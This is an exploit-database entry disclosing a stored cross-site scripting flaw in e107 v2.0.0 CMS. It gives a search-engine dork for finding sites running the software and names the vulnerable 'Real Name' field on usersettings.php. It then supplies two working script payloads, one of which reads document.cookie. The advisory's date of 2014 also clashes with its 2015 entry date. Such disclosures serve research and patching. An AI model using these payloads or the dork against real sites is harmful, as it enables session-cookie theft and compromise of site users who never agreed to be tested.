e107 2 Bootstrap CMS - XSS Vulnerability

2015-01-03T00:00:00
ID 1337DAY-ID-23059
Type zdt
Reporter 0x97
Modified 2015-01-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            _____       _____  ______
|  _  |     |  _  ||___  /
| |/' |_  __| |_| |   / /
|  /| \ \/ /\____ |  / / 
\ |_/ />  < .___/ /./ /  
 \___//_/\_\\____/ \_/   
                        by bl4ck s3c
 
 
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel
  
# Vulnerability Description:
 
CMS user details section is vulnerable to XSS. You can run XSS payloads.
 
XSS Vulnerability #1:
 
Go Update user settings page
 
"http://{target-url}/usersettings.php"
 
Set Real Name value;
 
"><script>alert(String.fromCharCode(88, 83, 83))</script>
 
or
 
"><script>alert(document.cookie)</script>
 
 
========
Credits:
========
  
Vulnerability found and advisory written by Ahmet Agar.
  
===========
References:
===========
  
http://www.0x97.info
htts://twitter.com/_HacKingZ_

#  0day.today [2018-04-14]  #